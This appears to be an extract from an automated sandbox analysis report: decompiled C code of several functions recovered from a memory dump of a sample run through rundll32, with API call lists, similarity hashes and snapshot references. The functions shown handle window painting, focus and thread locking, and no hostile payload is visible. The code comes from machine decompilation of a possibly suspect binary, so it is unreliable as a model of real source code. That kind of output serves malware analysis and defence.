                          0x02855ced
                          0x02855cf0
                          0x02855d06
                          0x02855d06

                          APIs
                          • GetClientRect.USER32(00000000,?), ref: 0285590F
                          • GetWindowRect.USER32(00000000,?), ref: 02855921
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 02855937
                          • OffsetRect.USER32(?,?,?), ref: 0285594C
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 02855962
                          • OffsetRect.USER32(?,?,?), ref: 02855977
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$OffsetWindow$ClientClipExcludePoints
                          • String ID:
                          • API String ID: 435961686-0
                          • Opcode ID: 6333195d9df47132ae8a46444d55f7fd8f0cfcce77fd8033a7dea1c6d7fa4ebb
                          • Instruction ID: f93fa89682251a0528413e0c72158c68ac7491377036a511d1fe7b7a89b2b3d8
                          • Opcode Fuzzy Hash: 6333195d9df47132ae8a46444d55f7fd8f0cfcce77fd8033a7dea1c6d7fa4ebb
                          • Instruction Fuzzy Hash: CB22DA78A041589FDB01EBACC588ADDB7F2AF48300F6545E4E954EB362DB34AE02DF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028164B8 Relevance: 9.3, APIs: 6, Instructions: 303windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E028164B8(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct HWND__* _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				void* __ebp;
				intOrPtr _t125;
				signed int _t126;
				struct HWND__* _t129;
				intOrPtr _t150;
				intOrPtr _t153;
				signed int _t159;
				signed int _t162;
				intOrPtr _t168;
				intOrPtr _t171;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t177;
				intOrPtr _t179;
				signed int _t185;
				void* _t189;
				intOrPtr _t193;
				intOrPtr _t227;
				void* _t261;
				intOrPtr _t284;
				intOrPtr _t290;
				intOrPtr _t297;
				void* _t304;
				void* _t306;
				intOrPtr _t307;
				void* _t309;
				void* _t313;

				_t304 = _t306;
				_t307 = _t306 + 0xffffffd4;
				_v12 = __edx;
				_v8 = __eax;
				_t125 =  *_v12;
				_t309 = _t125 - 0x46;
				if(_t309 > 0) {
					_t126 = _t125 - 0xb01a;
					__eflags = _t126;
					if(_t126 == 0) {
						__eflags =  *(_v8 + 0xa0);
						if(__eflags != 0) {
							E027D3408(_v8, __eflags);
						}
					} else {
						__eflags = _t126 == 1;
						if(_t126 == 1) {
							__eflags =  *(_v8 + 0xa0);
							if(__eflags != 0) {
								E027D3408(_v8, __eflags);
							}
						} else {
							goto L41;
						}
					}
					goto L43;
				} else {
					if(_t309 == 0) {
						_t150 = _v8;
						_t284 =  *0x2816940; // 0x1
						__eflags = _t284 - ( *(_t150 + 0x1c) &  *0x281693c);
						if(_t284 == ( *(_t150 + 0x1c) &  *0x281693c)) {
							_t153 = _v8;
							__eflags =  *((intOrPtr*)(_t153 + 0x230)) - 0xffffffffffffffff;
							if( *((intOrPtr*)(_t153 + 0x230)) - 0xffffffffffffffff < 0) {
								_t168 = _v8;
								__eflags =  *((char*)(_t168 + 0x22b)) - 2;
								if( *((char*)(_t168 + 0x22b)) != 2) {
									_v36 =  *((intOrPtr*)(_v12 + 8));
									_t171 = _v36;
									_t41 = _t171 + 0x18;
									 *_t41 =  *(_t171 + 0x18) | 0x00000002;
									__eflags =  *_t41;
								}
							}
							_t159 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
							__eflags = _t159;
							if(_t159 == 0) {
								L30:
								_t162 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
								__eflags = _t162;
								if(_t162 == 0) {
									L32:
									_v40 =  *((intOrPtr*)(_v12 + 8));
									 *(_v40 + 0x18) =  *(_v40 + 0x18) | 0x00000001;
								} else {
									__eflags = _t162 == 3;
									if(_t162 == 3) {
										goto L32;
									}
								}
							} else {
								__eflags = _t159 == 2;
								if(_t159 == 2) {
									goto L30;
								}
							}
						}
						goto L43;
					} else {
						_t129 = _t125 + 0xfffffffa - 3;
						if(_t129 < 0) {
							__eflags =  *0x2863c8c;
							if( *0x2863c8c != 0) {
								__eflags =  *_v12 - 7;
								if( *_v12 != 7) {
									goto L43;
								} else {
									_t174 = _v8;
									__eflags =  *(_t174 + 0x1c) & 0x00000010;
									if(( *(_t174 + 0x1c) & 0x00000010) != 0) {
										goto L43;
									} else {
										_v16 = 0;
										_t176 = _v8;
										__eflags =  *((char*)(_t176 + 0x22f)) - 2;
										if( *((char*)(_t176 + 0x22f)) != 2) {
											_t177 = _v8;
											__eflags =  *(_t177 + 0x220);
											if( *(_t177 + 0x220) != 0) {
												_t179 = _v8;
												__eflags =  *((intOrPtr*)(_t179 + 0x220)) - _v8;
												if( *((intOrPtr*)(_t179 + 0x220)) != _v8) {
													_v16 = E02833F7C( *((intOrPtr*)(_v8 + 0x220)));
												}
											}
										} else {
											_t185 = E02816F24(_v8, _t261);
											__eflags = _t185;
											if(_t185 != 0) {
												_v16 = E02833F7C(E02816F24(_v8, _t261));
											}
										}
										__eflags = _v16;
										if(_v16 == 0) {
											goto L43;
										} else {
											_t129 = SetFocus(_v16);
										}
									}
								}
							}
							goto L44;
						} else {
							_t189 = _t129 - 0x22;
							if(_t189 == 0) {
								_v44 =  *((intOrPtr*)(_v12 + 8));
								__eflags =  *_v44 - 1;
								if( *_v44 != 1) {
									goto L43;
								} else {
									_t193 = _v8;
									__eflags =  *(_t193 + 0x248);
									if( *(_t193 + 0x248) == 0) {
										goto L43;
									} else {
										_v24 = E0282677C( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v24;
										if(_v24 == 0) {
											goto L43;
										} else {
											_v28 = E027F7E84(0, 1);
											_push(_t304);
											_push(0x281676c);
											_push( *[fs:eax]);
											 *[fs:eax] = _t307;
											_v20 = SaveDC( *(_v44 + 0x18));
											_push(_t304);
											_push(0x281674f);
											_push( *[fs:eax]);
											 *[fs:eax] = _t307;
											E027F856C(_v28,  *(_v44 + 0x18));
											E027F83E8(_v28);
											E02827C64(_v24, _v44 + 0x1c, _v28,  *((intOrPtr*)(_v44 + 0x10)));
											_pop(_t290);
											 *[fs:eax] = _t290;
											_push(0x2816756);
											__eflags = 0;
											E027F856C(_v28, 0);
											return RestoreDC( *(_v44 + 0x18), _v20);
										}
									}
								}
							} else {
								if(_t189 == 1) {
									_v48 =  *((intOrPtr*)(_v12 + 8));
									__eflags =  *_v48 - 1;
									if( *_v48 != 1) {
										goto L43;
									} else {
										_t227 = _v8;
										__eflags =  *(_t227 + 0x248);
										if( *(_t227 + 0x248) == 0) {
											goto L43;
										} else {
											_v24 = E0282677C( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v48 + 8)));
											__eflags = _v24;
											if(_v24 == 0) {
												goto L43;
											} else {
												_v32 = GetWindowDC(E02833F7C(_v8));
												 *[fs:eax] = _t307;
												_v28 = E027F7E84(0, 1);
												 *[fs:eax] = _t307;
												_v20 = SaveDC(_v32);
												 *[fs:eax] = _t307;
												E027F856C(_v28, _v32);
												E027F83E8(_v28);
												 *((intOrPtr*)( *_v24 + 0x38))(_v48 + 0x10,  *[fs:eax], 0x281686c, _t304,  *[fs:eax], 0x2816889, _t304,  *[fs:eax], 0x28168b0, _t304);
												_pop(_t297);
												 *[fs:eax] = _t297;
												_push(0x2816873);
												__eflags = 0;
												E027F856C(_v28, 0);
												return RestoreDC(_v32, _v20);
											}
										}
									}
								} else {
									L41:
									_t313 =  *_v12 -  *0x2865b64; // 0xc076
									if(_t313 == 0) {
										E0282E93C(_v8, 0, 0xb025, 0);
										E0282E93C(_v8, 0, 0xb024, 0);
										E0282E93C(_v8, 0, 0xb035, 0);
										E0282E93C(_v8, 0, 0xb009, 0);
										E0282E93C(_v8, 0, 0xb008, 0);
										E0282E93C(_v8, 0, 0xb03d, 0);
									}
									L43:
									_t129 = E02831990(_v8, _v12);
									L44:
									return _t129;
								}
							}
						}
					}
				}
			}









































                          0x028164b9
                          0x028164bb
                          0x028164c0
                          0x028164c3
                          0x028164c9
                          0x028164cb
                          0x028164ce
                          0x028164f3
                          0x028164f3
                          0x028164f8
                          0x028165c6
                          0x028165cd
                          0x028165da
                          0x028165da
                          0x028164fe
                          0x028164fe
                          0x028164ff
                          0x028165a5
                          0x028165ac
                          0x028165b9
                          0x028165b9
                          0x02816505
                          0x00000000
                          0x02816505
                          0x028164ff
                          0x00000000
                          0x028164d0
                          0x028164d0
                          0x028165e4
                          0x028165f2
                          0x028165f9
                          0x028165fc
                          0x02816602
                          0x0281660c
                          0x0281660e
                          0x02816610
                          0x02816613
                          0x0281661a
                          0x02816622
                          0x02816625
                          0x02816628
                          0x02816628
                          0x02816628
                          0x02816628
                          0x0281661a
                          0x02816635
                          0x02816635
                          0x02816637
                          0x02816641
                          0x0281664a
                          0x0281664a
                          0x0281664c
                          0x02816656
                          0x0281665c
                          0x02816662
                          0x0281664e
                          0x0281664e
                          0x02816650
                          0x00000000
                          0x00000000
                          0x02816650
                          0x02816639
                          0x02816639
                          0x0281663b
                          0x00000000
                          0x00000000
                          0x0281663b
                          0x02816637
                          0x00000000
                          0x028164d6
                          0x028164d9
                          0x028164dc
                          0x0281650a
                          0x02816511
                          0x0281651a
                          0x0281651d
                          0x00000000
                          0x02816523
                          0x02816523
                          0x02816526
                          0x0281652a
                          0x00000000
                          0x02816530
                          0x02816532
                          0x02816535
                          0x02816538
                          0x0281653f
                          0x0281655f
                          0x02816562
                          0x02816569
                          0x0281656b
                          0x02816574
                          0x02816577
                          0x02816587
                          0x02816587
                          0x02816577
                          0x02816541
                          0x02816544
                          0x02816549
                          0x0281654b
                          0x0281655a
                          0x0281655a
                          0x0281654b
                          0x0281658a
                          0x0281658e
                          0x00000000
                          0x02816594
                          0x02816598
                          0x02816598
                          0x0281658e
                          0x0281652a
                          0x0281651d
                          0x00000000
                          0x028164de
                          0x028164de
                          0x028164e1
                          0x02816671
                          0x02816677
                          0x0281667a
                          0x00000000
                          0x02816680
                          0x02816680
                          0x02816683
                          0x0281668a
                          0x00000000
                          0x02816690
                          0x028166a6
                          0x028166a9
                          0x028166ad
                          0x00000000
                          0x028166b3
                          0x028166bf
                          0x028166c4
                          0x028166c5
                          0x028166ca
                          0x028166cd
                          0x028166dc
                          0x028166e1
                          0x028166e2
                          0x028166e7
                          0x028166ea
                          0x028166f6
                          0x02816709
                          0x02816722
                          0x02816729
                          0x0281672c
                          0x0281672f
                          0x02816734
                          0x02816739
                          0x0281674e
                          0x0281674e
                          0x028166ad
                          0x0281668a
                          0x028164e7
                          0x028164e8
                          0x02816779
                          0x0281677f
                          0x02816782
                          0x00000000
                          0x02816788
                          0x02816788
                          0x0281678b
                          0x02816792
                          0x00000000
                          0x02816798
                          0x028167ae
                          0x028167b1
                          0x028167b5
                          0x00000000
                          0x028167bb
                          0x028167c9
                          0x028167d7
                          0x028167e6
                          0x028167f4
                          0x02816800
                          0x0281680e
                          0x02816817
                          0x0281682a
                          0x02816844
                          0x02816849
                          0x0281684c
                          0x0281684f
                          0x02816854
                          0x02816859
                          0x0281686b
                          0x0281686b
                          0x028167b5
                          0x02816792
                          0x028164ee
                          0x028168b7
                          0x028168bc
                          0x028168c2
                          0x028168d0
                          0x028168e1
                          0x028168f2
                          0x02816903
                          0x02816914
                          0x02816925
                          0x02816925
                          0x0281692a
                          0x02816930
                          0x02816935
                          0x0281693a
                          0x0281693a
                          0x028164e8
                          0x028164e1
                          0x028164dc
                          0x028164d0

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: RestoreSave$FocusWindow
                          • String ID:
                          • API String ID: 1553564791-0
                          • Opcode ID: 4b3d985563e67a28fdc01916eee46c825ee419ed0c1848cf89b74d88f229a0ff
                          • Instruction ID: 26e9e28b8202ef0d99762126d69bbcf8843c663882ec1b8fb17c673e362b1cd5
                          • Opcode Fuzzy Hash: 4b3d985563e67a28fdc01916eee46c825ee419ed0c1848cf89b74d88f229a0ff
                          • Instruction Fuzzy Hash: 0EC14C3CA00218DFDB05DFA8D499AADBBF9EB08314F5540A5E488E73A5E734AE41CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0285F9D8 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E0285F9D8(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				struct tagRECT _v36;
				char _v52;
				intOrPtr _v56;
				char _v68;
				intOrPtr _t224;
				void* _t230;
				struct tagRECT* _t264;
				void* _t266;
				intOrPtr _t319;
				intOrPtr _t321;
				struct HDC__* _t335;
				void* _t341;
				void* _t343;

				_t343 = __eflags;
				_t333 = __edi;
				_t266 = __ecx;
				_t340 = _t341;
				_t335 = __edx;
				_v8 = __eax;
				_t264 =  &_v52;
				GetClientRect(E02833F7C(_v8),  &_v36);
				GetWindowRect(E02833F7C(_v8), _t264);
				MapWindowPoints(0, E02833F7C(_v8), _t264, 2);
				OffsetRect( &_v36,  ~(_t264->left),  ~(_t264->top));
				ExcludeClipRect(_t335, _v36, _v36.top, _v36.right, _v36.bottom);
				OffsetRect(_t264,  ~(_t264->left),  ~(_t264->top));
				_v12 = E027F84EC( *((intOrPtr*)(_v8 + 0x21c)));
				_push(_t341);
				_push(0x285fd1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t341 + 0xffffffc0;
				E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _t335);
				E027F7AD0( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t266, 1, __edi, _t341);
				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t266,  *((intOrPtr*)(E02855D3C(_v8, _t343) + 0x7c)), __edi, _t341);
				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _t264->top, _t264->right);
				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->top, _t264->left);
				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom, _t264->left);
				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t264->bottom,  *((intOrPtr*)(E02855D3C(_v8, _t343) + 0x78)), __edi, _t341);
				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _t264->top + 1, _t264->right - 1);
				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->top + 1, _t264->left + 1);
				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 2, _t264->left + 1);
				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t264->bottom - 2,  *((intOrPtr*)(E02855D3C(_v8, _t343) + 0x84)), __edi, _t341);
				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _t264->top, _t264->right - 1);
				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 1, _t264->right - 1);
				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 1, _t264->left - 1);
				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t264->bottom - 1,  *((intOrPtr*)(E02855D3C(_v8, _t343) + 0x80)), __edi, _t340);
				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _t264->top + 1, _t264->right - 2);
				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 2, _t264->right - 2);
				E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _t264->bottom - 2, _t264->left);
				_t224 = _v8;
				_t344 =  *((intOrPtr*)(_t224 + 0x210));
				if( *((intOrPtr*)(_t224 + 0x210)) != 0) {
					_t230 = E02855D3C(_v8, _t344);
					if( *((intOrPtr*)(_t230 + 0x34)) !=  *((intOrPtr*)(E02855D3C(_v8, _t344) + 0x7c))) {
						_t321 =  *0x285ded8; // 0x285df24
						if(E027D3398( *((intOrPtr*)(_v8 + 0x2ac)), _t321) != 0) {
							E0282D0F0( *((intOrPtr*)(_v8 + 0x2ac)),  &_v68);
							E0282D268( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2ac)) + 0x30)),  &_v20,  &_v68);
							E0282D0F0(_v8,  &_v68);
							_t347 = _v56 - _v16;
							if(_v56 > _v16) {
								__eflags = 0;
								_v16 = 0;
							} else {
								_v16 = _t264->bottom - 1;
							}
							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v16, _v20 -  *((intOrPtr*)(_v8 + 0x40)) + 1);
							E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _v16,  *((intOrPtr*)(E02855D3C(_v8, _t347) + 0x34)), _t333, _t340);
							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v16, _v20 -  *((intOrPtr*)(_v8 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2ac)) + 0x48)) - 1);
						}
					}
				}
				_pop(_t319);
				 *[fs:eax] = _t319;
				_push(0x285fd26);
				return E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _v12);
			}




















                          0x0285f9d8
                          0x0285f9d8
                          0x0285f9d8
                          0x0285f9d9
                          0x0285f9e0
                          0x0285f9e2
                          0x0285f9e5
                          0x0285f9f5
                          0x0285fa04
                          0x0285fa17
                          0x0285fa2b
                          0x0285fa41
                          0x0285fa52
                          0x0285fa65
                          0x0285fa6a
                          0x0285fa6b
                          0x0285fa70
                          0x0285fa73
                          0x0285fa81
                          0x0285fa97
                          0x0285fab3
                          0x0285fac7
                          0x0285fada
                          0x0285faed
                          0x0285fb09
                          0x0285fb1f
                          0x0285fb34
                          0x0285fb4b
                          0x0285fb6a
                          0x0285fb7f
                          0x0285fb95
                          0x0285fbaa
                          0x0285fbc9
                          0x0285fbe1
                          0x0285fbfb
                          0x0285fc11
                          0x0285fc16
                          0x0285fc19
                          0x0285fc20
                          0x0285fc29
                          0x0285fc3c
                          0x0285fc4b
                          0x0285fc58
                          0x0285fc6c
                          0x0285fc7a
                          0x0285fc85
                          0x0285fc8d
                          0x0285fc90
                          0x0285fc9b
                          0x0285fc9d
                          0x0285fc92
                          0x0285fc96
                          0x0285fc96
                          0x0285fcba
                          0x0285fcd6
                          0x0285fcfb
                          0x0285fcfb
                          0x0285fc58
                          0x0285fc3c
                          0x0285fd02
                          0x0285fd05
                          0x0285fd08
                          0x0285fd1e

                          APIs
                          • GetClientRect.USER32(00000000,?), ref: 0285F9F5
                          • GetWindowRect.USER32(00000000,?), ref: 0285FA04
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0285FA17
                          • OffsetRect.USER32(?,?,?), ref: 0285FA2B
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0285FA41
                          • OffsetRect.USER32(?,?,?), ref: 0285FA52
                            • Part of subcall function 027F81B0: MoveToEx.GDI32(00000000,?,?,00000000), ref: 027F81CE
                            • Part of subcall function 027F8150: LineTo.GDI32(?), ref: 027F8173
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$OffsetWindow$ClientClipExcludeLineMovePoints
                          • String ID:
                          • API String ID: 3767273771-0
                          • Opcode ID: 520f17e9fe583ee0865ab589caf88aa5e0cc6706ba919c0edabe1616536101c5
                          • Instruction ID: f3f70b26ef304d23a6391d95d17c0d13cca12ef3e64a3667e9e62b63bdcc4093
                          • Opcode Fuzzy Hash: 520f17e9fe583ee0865ab589caf88aa5e0cc6706ba919c0edabe1616536101c5
                          • Instruction Fuzzy Hash: 92B16F78644118DFCB45EF98C988DAEB7F6EF58300B2585E4E909AB365CB30EE019F51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028169E4 Relevance: 9.2, APIs: 6, Instructions: 150COMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E028169E4(intOrPtr* __eax, intOrPtr* __edx) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				struct tagRECT _v112;
				signed int _v116;
				long _v120;
				void* __ebp;
				void* _t68;
				void* _t94;
				struct HBRUSH__* _t97;
				intOrPtr _t105;
				void* _t118;
				void* _t127;
				intOrPtr _t140;
				intOrPtr _t146;
				void* _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				intOrPtr _t153;

				_t138 = __edx;
				_t150 = _t152;
				_t153 = _t152 + 0xffffff8c;
				_v12 = __edx;
				_v8 = __eax;
				_t68 =  *_v12 - 0xf;
				if(_t68 == 0) {
					_v16 =  *(_v12 + 4);
					if(_v16 == 0) {
						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
					}
					_push(_t150);
					_push(0x2816bb2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t153;
					if(_v16 == 0) {
						GetWindowRect( *(_v8 + 0x254),  &_v96);
						E0282D294(_v8,  &_v120,  &_v96);
						_v96.left = _v120;
						_v96.top = _v116;
						E0282C064( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
					}
					E02831C30(_v8, _t127, _v12, _t147, _t148);
					_pop(_t140);
					 *[fs:eax] = _t140;
					_push(0x2816bc0);
					if(_v16 == 0) {
						return EndPaint( *(_v8 + 0x254),  &_v80);
					}
					return 0;
				} else {
					_t94 = _t68 - 5;
					if(_t94 == 0) {
						_t97 = E027F7CD8( *((intOrPtr*)(_v8 + 0x170)));
						 *((intOrPtr*)( *_v8 + 0x44))();
						FillRect( *(_v12 + 4),  &_v112, _t97);
						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
							GetClientRect( *(_v8 + 0x254),  &_v96);
							FillRect( *(_v12 + 4),  &_v96, E027F7CD8( *((intOrPtr*)(_v8 + 0x170))));
						}
						_t105 = _v12;
						 *((intOrPtr*)(_t105 + 0xc)) = 1;
					} else {
						_t118 = _t94 - 0x2b;
						if(_t118 == 0) {
							E02816944(_t150);
							_t105 = _v8;
							if( *((char*)(_t105 + 0x22f)) == 2) {
								if(E02816F74(_v8) == 0 || E02816990(_t138, _t150) == 0) {
									_t146 = 1;
								} else {
									_t146 = 0;
								}
								_t105 = E02813204( *(_v8 + 0x254), _t146);
							}
						} else {
							if(_t118 != 0x45) {
								_t105 = E02816944(_t150);
							} else {
								E02816944(_t150);
								_t105 = _v12;
								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
									_t105 = _v12;
									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
								}
							}
						}
					}
					return _t105;
				}
			}

























                          0x028169e4
                          0x028169e5
                          0x028169e7
                          0x028169ea
                          0x028169ed
                          0x028169f5
                          0x028169f8
                          0x02816b08
                          0x02816b0f
                          0x02816b27
                          0x02816b27
                          0x02816b2c
                          0x02816b2d
                          0x02816b32
                          0x02816b35
                          0x02816b3c
                          0x02816b4c
                          0x02816b5a
                          0x02816b62
                          0x02816b68
                          0x02816b7b
                          0x02816b7b
                          0x02816b86
                          0x02816b8d
                          0x02816b90
                          0x02816b93
                          0x02816b9c
                          0x00000000
                          0x02816bac
                          0x02816bb1
                          0x028169fe
                          0x028169fe
                          0x02816a01
                          0x02816a41
                          0x02816a4f
                          0x02816a5d
                          0x02816a6c
                          0x02816a88
                          0x02816aa7
                          0x02816aa7
                          0x02816aac
                          0x02816aaf
                          0x02816a03
                          0x02816a03
                          0x02816a06
                          0x02816abc
                          0x02816ac2
                          0x02816acc
                          0x02816adc
                          0x02816aed
                          0x02816ae9
                          0x02816ae9
                          0x02816ae9
                          0x02816af8
                          0x02816af8
                          0x02816a0c
                          0x02816a0f
                          0x02816bba
                          0x02816a15
                          0x02816a16
                          0x02816a1c
                          0x02816a23
                          0x02816a29
                          0x02816a2c
                          0x02816a2c
                          0x02816a23
                          0x02816a0f
                          0x02816a06
                          0x02816bc3
                          0x02816bc3

                          APIs
                          • FillRect.USER32(?,?), ref: 02816A5D
                          • GetClientRect.USER32(00000000,?), ref: 02816A88
                          • FillRect.USER32(?,?,00000000), ref: 02816AA7
                            • Part of subcall function 02816944: CallWindowProcA.USER32(?,?,?,?,?), ref: 0281697E
                          • BeginPaint.USER32(?,?), ref: 02816B1F
                          • GetWindowRect.USER32(?,?), ref: 02816B4C
                          • EndPaint.USER32(?,?,02816BC0), ref: 02816BAC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$FillPaintWindow$BeginCallClientProc
                          • String ID:
                          • API String ID: 901200654-0
                          • Opcode ID: 1f09c2a9749228c384bb845e741b920c617f35a5260c7671aeac8616c3cf7e33
                          • Instruction ID: cbdfc02ea583026955f18694821ecb818a478bd8dd27baa45dcf7013800847e6
                          • Opcode Fuzzy Hash: 1f09c2a9749228c384bb845e741b920c617f35a5260c7671aeac8616c3cf7e33
                          • Instruction Fuzzy Hash: AD51E979A00118EFCB00DFA8C988E9DB7FDAF49314F1585A5E448EB291E735AA85CF14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F36B4 Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E027F36B4(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x2864794; // 0x2865034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x28645d0; // 0x27e6730
					E027DBCBC(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E027D3A9C();
				}
				if(_t53 <= 0) {
					E027F368C();
				} else {
					E027F3698(_t53);
				}
				_v16 = 0;
				_push(0x2865870);
				L027D656C();
				_push(_t72);
				_push(0x27f3842);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange(0x28635b8, _v16);
				_push(_t72);
				_push(0x27f3823);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L14:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x27f382a);
					return E027D320C(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E027EB1E0(_v16, 0);
						E027EB0D0(_v16, 0);
						L027D66B4();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x27f37ed, _t72, 0x2865870);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x27f37be;
						 *[fs:eax] = _t67;
						_push(0x27f37f4);
						_push(0x2865870);
						L027D656C();
						return 0;
